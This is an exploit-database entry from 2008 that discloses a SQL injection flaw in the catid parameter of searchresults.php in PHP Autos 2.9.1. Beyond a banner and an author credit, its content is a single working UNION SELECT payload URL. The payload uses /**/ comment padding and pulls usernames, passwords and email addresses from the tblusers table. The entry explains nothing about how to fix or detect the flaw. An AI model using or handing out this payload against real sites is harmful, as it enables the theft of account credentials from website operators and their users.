id: 3852
date: 10/06/2008
title: PHP Autos 2.9.1 (searchresults.php catid) SQL Injection Vulnerability
author: Mr.SQL
cves: 

=====================================================================
PHP Autos 2.9.1 (searchresults.php catid) SQL Injection Vulnerability
=====================================================================


###############################################################
##
## Remote SQL Injection Vulnerability
##
## PHP Auto's V2.9.1 ( searchresults.php catid )
##
## http://www.phpautos.com/
###############################################################
###############################################################
## AuTh0r : Mr.SQL
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT./searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/*
##
########################
########################




#  0day.today [2023-03-25]  #